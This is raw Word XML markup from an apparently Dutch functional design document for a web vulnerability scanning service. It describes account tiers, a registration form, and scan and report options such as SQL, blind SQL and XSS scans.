                    <w:p w14:paraId="172A6A7B" w14:textId="5143B205" w:rsidR="000E3238" w:rsidRPr="00A62C51" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00A62C51" w:rsidRDefault="000E3238"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ADE8"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5EA0"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0E3238" w:rsidRPr="000B458C" w:rsidRDefault="000E3238"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8"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golPvXkCAABjBQAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA9Qgtk94AAAALAQAA&#10;DwAAAAAAAAAAAAAAAADRBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="04CAB098" w14:textId="31F26C89" w:rsidR="000E3238" w:rsidRPr="000B458C" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="004E4312" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Premiumaccount</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0597E4E9" w14:textId="5584EBFD" w:rsidR="000E3238" w:rsidRPr="004E4312" w:rsidRDefault="000E3238" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="19"/>
                              </w:numPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004E4312">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Alle scan opties</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2EFDB13B" w14:textId="2416F284" w:rsidR="000E3238" w:rsidRPr="004E4312" w:rsidRDefault="000E3238" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="19"/>
                              </w:numPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004E4312">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Alle rapport types</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="675E34A8" w14:textId="1F62717F" w:rsidR="000E3238" w:rsidRPr="004E4312" w:rsidRDefault="000E3238"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9"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GaH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0+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6kdGaHkCAABkBQAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEALjrNet4AAAANAQAA&#10;DwAAAAAAAAAAAAAAAADRBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="20576F7A" w14:textId="7E4A92BC" w:rsidR="000E3238" w:rsidRPr="004E4312" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Premiumaccount</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="0597E4E9" w14:textId="5584EBFD" w:rsidR="000E3238" w:rsidRPr="004E4312" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="004E4312" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="004E4312" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Standaardaccount</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="37F1215A" w14:textId="65A91B93" w:rsidR="000E3238" w:rsidRPr="00F97E77" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00F97E77" w:rsidRDefault="000E3238"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0"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3E6864C3" w14:textId="38E84A5A" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Standaardaccount</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="37F1215A" w14:textId="65A91B93" w:rsidR="000E3238" w:rsidRPr="00F97E77" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00F97E77" w:rsidRDefault="000E3238"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52B2"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241096">
          <w:headerReference w:type="default" r:id="rId57"/>
          <w:headerReference w:type="first" r:id="rId58"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417"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0E3238" w:rsidRDefault="000E3238"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1"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njH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NiEZ4x7AgAAZAUA&#10;AA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAK/XRtvgAAAA&#10;DwEAAA8AAAAAAAAAAAAAAAAA0wQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADgBQAA&#10;AAA=&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="37539508" w14:textId="3AAB3733" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238"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2"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AU3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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6C523CED" w14:textId="143E558D" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238">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3"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Xvfm3XsCAABkBQAA&#10;DgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAqCSOqt8AAAAN&#10;AQAADwAAAAAAAAAAAAAAAADTBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAN8FAAAA&#10;AA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="291AD880" w14:textId="621B5A7A" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="00AC3FAA" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AC3FAA">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Registratie</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="18265A93" w14:textId="6AAA7D03" w:rsidR="000E3238" w:rsidRPr="007066FB" w:rsidRDefault="000E3238">
                            <w:r w:rsidRPr="007066FB">
                              <w:t>Met het registratieformulier kunnen gebruikers zichzelf registreren om een account aan te maken.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="298AC4C4" w14:textId="12739B71" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:r>
                              <w:t>De standaardvelden email en URL worden door Pandora meegegeven en hoeven niet ingevuld te worden.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="24B6C36B" w14:textId="126C3385" w:rsidR="000E3238" w:rsidRPr="007066FB" w:rsidRDefault="000E3238">
                            <w:r>
                              <w:t xml:space="preserve">Het veld alternatieve e-mailadres kan de gebruiker invullen als hij de standaard emailadres van het Wordpress account niet wilt gebruiker. </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7617A9EC" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="007066FB" w:rsidRDefault="000E3238"/>
                          <w:p w14:paraId="0250B685" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="007066FB"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4"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="64A6D813" w14:textId="01198638" w:rsidR="000E3238" w:rsidRPr="00AC3FAA" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AC3FAA">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Registratie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="18265A93" w14:textId="6AAA7D03" w:rsidR="000E3238" w:rsidRPr="007066FB" w:rsidRDefault="000E3238">
                      <w:r w:rsidRPr="007066FB">
                        <w:t>Met het registratieformulier kunnen gebruikers zichzelf registreren om een account aan te maken.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="298AC4C4" w14:textId="12739B71" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t>De standaardvelden email en URL worden door Pandora meegegeven en hoeven niet ingevuld te worden.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="24B6C36B" w14:textId="126C3385" w:rsidR="000E3238" w:rsidRPr="007066FB" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="007066FB" w:rsidRDefault="000E3238"/>
                    <w:p w14:paraId="0250B685" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="007066FB" w:rsidRDefault="000E3238"/>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0E3238" w:rsidRDefault="000E3238" w:rsidP="00E85184">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AC3FAA">
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Aanvraag scan (standaard)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0A660C76" w14:textId="021DB586" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00E85184">
                            <w:r>
                              <w:t xml:space="preserve">Met het standaard aanvraagformulier kunnen gebruikers enkel een soort scan aanvragen met de volgende specificaties: </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="19203743" w14:textId="03F4CC73" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00542A1C">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Quick Scan</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="60AAF175" w14:textId="18FE0D9E" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00542A1C">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Short Report</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="53B7C69B" w14:textId="599ED8B0" w:rsidR="000E3238" w:rsidRPr="008B659F" w:rsidRDefault="000E3238"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5"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LznsCAABm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MDxLznsCAABmBQAA&#10;DgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA/OTH0N8AAAAL&#10;AQAADwAAAAAAAAAAAAAAAADTBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAN8FAAAA&#10;AA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="603B2513" w14:textId="5C051D7D" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238" w:rsidP="00E85184">
                      <w:r>
                        <w:t xml:space="preserve">Met het standaard aanvraagformulier kunnen gebruikers enkel een soort scan aanvragen met de volgende specificaties: </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="19203743" w14:textId="03F4CC73" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00542A1C">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Quick Scan</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="60AAF175" w14:textId="18FE0D9E" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00542A1C">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Short Report</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="53B7C69B" w14:textId="599ED8B0" w:rsidR="000E3238" w:rsidRPr="008B659F" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238">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6"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="480B0804" w14:textId="79E9E453" w:rsidR="000E3238" w:rsidRDefault="000E3238">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E7123"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0E3238" w:rsidRDefault="000E3238">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7"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="51B95B3F" w14:textId="68051AD7" w:rsidR="000E3238" w:rsidRDefault="000E3238">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449B"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0E3238" w:rsidRDefault="000E3238">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78"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v3uHynsCAABlBQAA&#10;DgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAY4IEP98AAAAL&#10;AQAADwAAAAAAAAAAAAAAAADTBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAN8FAAAA&#10;AA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3723EA36" w14:textId="18E11F9F" w:rsidR="000E3238" w:rsidRDefault="000E3238">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06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F8C1D"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D8A00"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261D"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0E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>Scan opties</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2E4224DF" w14:textId="393798DF" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Full scan</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="543BC038" w14:textId="24F07B6E" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Blind SQL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="003ABEFC" w14:textId="38BBEB53" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-SQL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3FA4B2F2" w14:textId="1C3FAA1E" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-XSS</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2C71BA31" w14:textId="516E0801" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Quick Scan</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="30652807" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="64D55890" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E323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79"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I+3oCAABlBQAADgAAAGRycy9lMm9Eb2MueG1srFRbT9swFH6ftP9g+X2k7eg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BSpQj7egIAAGUFAAAO&#10;AAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCdpf+B3wAAAAsB&#10;AAAPAAAAAAAAAAAAAAAAANIEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA3gUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="44B295DD" w14:textId="3A8D3D47" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>Scan opties</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2E4224DF" w14:textId="393798DF" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Full scan</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="543BC038" w14:textId="24F07B6E" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Blind SQL</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="003ABEFC" w14:textId="38BBEB53" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-SQL</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3FA4B2F2" w14:textId="1C3FAA1E" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-XSS</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2C71BA31" w14:textId="516E0801" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Quick Scan</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="30652807" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="64D55890" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E323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0E3238" w:rsidRDefault="000E3238" w:rsidP="00BC1E78">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>Rapport opties</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="72AB97F5" w14:textId="0244AB9B" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00BC1E78">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Full Report</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3BF18F49" w14:textId="1F78169A" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00BC1E78">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Short Report</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2D943ECD" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0"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AvOO6HegIAAGUFAAAO&#10;AAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQADNb7C3wAAAAsB&#10;AAAPAAAAAAAAAAAAAAAAANIEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA3gUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1EC1C6F6" w14:textId="0E998152" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00BC1E78">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>Rapport opties</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="72AB97F5" w14:textId="0244AB9B" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00BC1E78">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Full Report</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3BF18F49" w14:textId="1F78169A" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00BC1E78">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Short Report</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2D943ECD" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238"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6DE7"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144C2"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DCF2"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258A"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5443B"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1D07"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0E3238" w:rsidRDefault="000E3238">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1"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3A85EF96" w14:textId="40FB18FA" w:rsidR="000E3238" w:rsidRDefault="000E3238">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EE1B2"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AA3CB"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0E3238" w:rsidRDefault="000E3238">
                            <w:r>
                              <w:t>Beschrijving van standaard aanvraag</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6A87BF23" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="003B15E4"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2"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pQX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y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AV+KlBegIAAGUFAAAO&#10;AAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCVxHOV3wAAAAsB&#10;AAAPAAAAAAAAAAAAAAAAANIEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA3gUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0395060A" w14:textId="72BBDBE1" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t>Beschrijving van standaard aanvraag</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6A87BF23" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="003B15E4" w:rsidRDefault="000E3238"/>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5AEB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DD34"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FCC0"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0E3238" w:rsidRDefault="000E3238"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3"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IEXEDZ5AgAAYwUAAA4A&#10;AAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAL753UDfAAAACwEA&#10;AA8AAAAAAAAAAAAAAAAA0QQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADdBQAAAAA=&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="119784AE" w14:textId="17A4BF1D" w:rsidR="000E3238" w:rsidRDefault="000E3238"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3F593"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023DB"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0E3238" w:rsidRPr="000A1B8C" w:rsidRDefault="000E3238">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4"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D62gh+eQIAAGUFAAAO&#10;AAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQChyBQ54AAAAAwB&#10;AAAPAAAAAAAAAAAAAAAAANEEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA3gUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="38CC5ACF" w14:textId="0285DE5D" w:rsidR="000E3238" w:rsidRPr="000A1B8C" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="00211DCB" w:rsidRDefault="000E3238">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5"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0QXgCAABkBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtIW7WMVq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CfrfRBeAIAAGQFAAAOAAAA&#10;AAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCAqYVN3gAAAAsBAAAP&#10;AAAAAAAAAAAAAAAAANAEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA2wUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="25FFE659" w14:textId="771484F4" w:rsidR="000E3238" w:rsidRPr="00211DCB" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Bedrijf</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98B1"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0E3238" w:rsidRPr="00211DCB" w:rsidRDefault="000E3238">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6"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AWwhL8egIAAGUFAAAOAAAA&#10;AAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCImks43AAAAAkBAAAP&#10;AAAAAAAAAAAAAAAAANIEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA2wUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4BFB0FA2" w14:textId="2A73B159" w:rsidR="000E3238" w:rsidRPr="00211DCB" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Naam</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0F83"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495F3"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A7BD"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77F4"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E391"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C245"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915DA"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B4071"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0E3238" w:rsidRDefault="000E3238" w:rsidP="00E85184">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00C406BD">
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Aanvraag scan (Premium)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4FD2E7F9" w14:textId="130B6887" w:rsidR="000E3238" w:rsidRPr="00B568D8" w:rsidRDefault="000E3238"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7"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AB9LFB7AgAAZgUA&#10;AA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhALDHkoXgAAAA&#10;DAEAAA8AAAAAAAAAAAAAAAAA0wQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADgBQAA&#10;AAA=&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3FAF7615" w14:textId="6AD38645" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00B568D8" w:rsidRDefault="000E3238"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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC3B3AD" w14:textId="77777777" w:rsidR="00E85184" w:rsidRPr="00A754AF" w:rsidRDefault="00E85184" w:rsidP="00A754AF">
      <w:pPr>
        <w:sectPr w:rsidR="00E85184" w:rsidRPr="00A754AF" w:rsidSect="00241096">
          <w:headerReference w:type="first" r:id="rId59"/>
          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="1417" w:bottom="0" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="37" w:name="_Toc496292446"/>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923A7"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bookmarkEnd w:id="37"/>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D1B3"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0E3238" w:rsidRDefault="000E3238">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88"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0X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d9XlK1RZs99asSnLyu0YwbEeK98NgN9A/7Hu/w0YbaktNAcbYi//Nv/ITH&#10;yELKWYtdK3n4sRZecWa+WAzzx/HxcVrO/Dg+OZvg4Q8ly0OJXTeXhLaMcVmczGTCR7MjtafmCWdh&#10;kbxCJKyE75LHHXkZ+wuAsyLVYpFBWEcn4o19cDKZTmVOo/bYPQnvhnmMGORb2m2lmL0ayx6bNC0t&#10;1pF0nWc2Fbqv6tAArHIe5eHspFtx+M6ol+M4/wU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PlmKNF4AgAAZAUAAA4AAAAA&#10;AAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAAOSwozdAAAACQEAAA8A&#10;AAAAAAAAAAAAAAAA0AQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADaBQAAAAA=&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="00DD4706" w14:textId="7E18E822" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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89"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7sFnk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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="435BF8CF" w14:textId="358D4F17" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E323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0"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Nn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TYd+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KY4/zZ4AgAAZAUAAA4AAAAA&#10;AAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhADQeoPHdAAAACQEAAA8A&#10;AAAAAAAAAAAAAAAA0AQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADaBQAAAAA=&#10;" filled="f" stroked="f">
